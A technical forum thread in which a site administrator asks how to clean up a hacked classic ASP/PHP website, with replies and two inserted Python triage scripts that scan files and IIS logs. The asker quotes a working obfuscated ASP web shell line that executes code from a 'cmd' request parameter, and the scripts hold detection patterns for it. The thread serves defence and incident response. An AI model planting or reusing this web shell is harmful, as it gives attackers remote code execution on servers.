Cleaning up a hacked website

I've been assigned to clean up a website that's been hacked somehow.

If I understand it correctly, the website runs ASP code (suspect it's not ASP.NET but not sure how to check) connecting to several Access databases. It also has a section of the site using the PHP CodeIgniter framework. It's suspected that the attacker initially gained access through a weak FTP password.

After an initial clean up and a change of the FTP password, more malicious activity was detected. I suppose it's possible the avenue for this attack may have been different to the initial one.

I've found 9 ASP files that are clearly malicious. However, I'm not particularly familiar with the code on the site and am very aware that I'm unlikely to find them all, so I'm trying to get hold of a backup prior to the initial hack, for comparison purposes. If available, I will try to restore the programming files to what was there prior to the hack.

Are there any tools I can use that might detect malicious files with reasonable accuracy? Are there any neat tricks I can use to at least detect malicious behaviour? Is there anything else that would be useful to know or try?
Terry Woods
5 Solutions
I wish I could provide clever answers to your questions, but honestly I treat hacked websites/webservers like I treat virused/malware-infected computers: wipe and reload the machine and restore from a known good backup.

Once a machine has been compromised, there is no guarantee that you can catch everything and undo the damage.

Good luck!
Paul MacDonald, Director, Information Systems, Commented:
Code is code and there's rarely a way to define intent without human intervention.  As it is, your best bet is to restore from a known good backup.  If that can't be done, you'll probably have to go through each page, one-at-a-time.  

Be aware the hacker may have compromised the operating system itself.  This wouldn't normally be possible, but if the web site and/or FTP site were running as users with sufficient permissions, the hacker could have put (or written code to put) files anywhere.
As a side note - regular FTP is done over plain text. There's no encryption, so anyone that listens to the communication can see the password, no matter how complex / strong it is. Always use SFTP or FTPS (whatever your server supports) for transferring / managing files.

More often than not, hacks are due to vulnerabilities in the code or an unpatched system. Maybe the server hasn't been keeping up with security updates, or maybe you've downloaded some 3rd party code that had a vulnerability in it. For example, PHPMyAdmin was a common script that a lot of people used for years, but there were vulnerabilities in it and people could get hacked just by having it on their web server. There may be ASP equivalents.

ASP.NET code typically is in files with the extension .aspx, while classic ASP uses .asp as the extension.
Big Monty, Senior Web Developer / CEO of ExchangeTree.org, Commented:
Another place you'll want to check is in your database. If you have any kind of data collection (e.g. forms) and you don't sanitize the input, hackers in theory could save malicious HTML, and when that data is written out to the screen, you have been hacked.

Do a search in any text or varchar fields in your database on the string "<script" (without the quotes) and that'll tell you if any bad scripts have been saved to your database.
Terry Woods, IT Guru, Author, Commented:
It's pretty much as I thought then. I'm waiting to see what backups I have available. I suspect I may have to retain the current copy of the databases though, so @Big_Monty's suggestion on what to look for in the databases could be very useful.

I thought the contents of this .asp file were interesting:
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%

The characters spell out "request". Would this be malicious by any chance? This particular file was date stamped differently to the other malicious ones I found, but I guess one of the easy hacker tricks would be to encourage the victim to think they have found all the malicious files through date stamping most of them with the date of the hack... anyway, I'm not going to put much more time into trying to find individual files since it's probably a fruitless exercise.
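A triage scan for the pattern in the file quoted above, added here as an example and not part of the original post: it decodes chr() concatenations and flags bare eval/execute calls in script files. The extension list, the four-character threshold and the names used are assumptions, and a match is a lead for manual review, not proof.

```python
import re
import sys
from pathlib import Path

# chr(n)+chr(n)... chains; VBScript also concatenates with &
CHR_CHAIN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*[+&]\s*chr\(\s*\d{1,3}\s*\))+", re.I)
CHR_CALL = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.I)
# eval/execute as bare calls; the lookbehind skips methods such as conn.Execute
DYNAMIC = re.compile(r"(?<![.\w])(eval|executeglobal|execute)\b", re.I)
SCRIPT_EXT = {".asp", ".asa", ".cer", ".php"}  # assumed handler mappings

def decoded_strings(text):
    """Return the strings built by chr() chains, ignoring short/control ones."""
    out = []
    for m in CHR_CHAIN.finditer(text):
        s = "".join(chr(int(n)) for n in CHR_CALL.findall(m.group(0)))
        if len(s) >= 4 and s.isprintable():   # skips Chr(13) & Chr(10) etc.
            out.append(s)
    return out

def assess(text):
    """Heuristic triage of one file; an empty list means nothing matched."""
    findings = []
    hidden = decoded_strings(text)
    if hidden:
        findings.append(f"chr() chain hides {hidden}")
    dynamic = DYNAMIC.search(text)
    if dynamic:
        findings.append(f"dynamic evaluation via {dynamic.group(1).lower()}")
    if dynamic and "request" in (text + " ".join(hidden)).lower():
        findings.append("evaluated code may come from the HTTP request")
    return findings

def scan(root):
    """Assess every script file under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXT:
            findings = assess(path.read_text(errors="replace"))
            if findings:
                report[str(path)] = findings
    return report

# First sample is the line quoted in the post; the second is constructed.
SAMPLE_POSTED = '<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("cmd"))%'
SAMPLE_BENIGN = '<% Set rs = conn.Execute(sql) : Response.Write Chr(13) & Chr(10) %>'

if __name__ == "__main__":
    for path, findings in scan(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(path, *findings, sep="\n  ")
```

Run it against a copy of the web root rather than the live site, and compare whatever it flags with the pre-hack backup once that is available.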
Big Monty, Senior Web Developer / CEO of ExchangeTree.org, Commented:
Most likely that page is a hack as well; do a search for that string and some shady sites come up talking about viruses and trojans....
Scott Fell, EE MVE, Developer & EE Moderator, Commented:
It's possible that they used code to create files on the fly.  I would look at the logs too and see if you can find some odd query string requests on a particular page.
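One way to do the log review suggested above, added here as an example and not part of the original post: it reads W3C extended format logs (the IIS default) using the log's own #Fields header and lists pages that received odd query strings, with the client IPs involved. The token list, the length threshold and the sample log lines are constructed assumptions; the `cmd` parameter comes from the .asp file quoted earlier in the thread.

```python
from collections import defaultdict
from urllib.parse import parse_qsl, unquote_plus

SUSPECT_PARAMS = {"cmd"}   # parameter read by the .asp file quoted in the thread
SUSPECT_TOKENS = ("<script", "eval(", "execute(")  # assumed markers of code
MAX_QUERY_LEN = 200        # assumed threshold for an unusually long query

def parse_w3c(lines):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):   # skip truncated lines
                yield dict(zip(fields, values))

def reasons(query):
    """Explain why a query string looks odd; empty list if it does not."""
    if query in ("", "-"):                   # "-" means no query string
        return []
    found = []
    names = {k.lower() for k, _ in parse_qsl(query, keep_blank_values=True)}
    if names & SUSPECT_PARAMS:
        found.append("parameter " + ",".join(sorted(names & SUSPECT_PARAMS)))
    decoded = unquote_plus(query).lower()
    found += [f"contains {t!r}" for t in SUSPECT_TOKENS if t in decoded]
    if len(query) > MAX_QUERY_LEN:
        found.append(f"query length {len(query)}")
    return found

def odd_requests(lines):
    """Map each page to the set of (client IP, reason) pairs seen for it."""
    hits = defaultdict(set)
    for req in parse_w3c(lines):
        for why in reasons(req.get("cs-uri-query", "-")):
            hits[req.get("cs-uri-stem", "?")].add((req.get("c-ip", "?"), why))
    return dict(hits)

# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2015-03-01 10:00:01 GET /default.asp - 198.51.100.7 200
2015-03-01 10:00:05 GET /products.asp id=12 198.51.100.7 200
2015-03-01 10:02:11 GET /images/thumbs.asp cmd=test 203.0.113.50 200
2015-03-01 10:03:30 GET /contact.asp name=%3Cscript%3Ex 198.51.100.23 200
"""

if __name__ == "__main__":
    for page, seen in odd_requests(SAMPLE_LOG.splitlines()).items():
        print(page, sorted(seen))
```

A page that turns up here but is absent from the pre-hack backup is a strong candidate for a planted file; POST bodies are not logged, so a quiet log does not clear a page.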
Terry Woods, IT Guru, Author, Commented:
Thanks all for your help!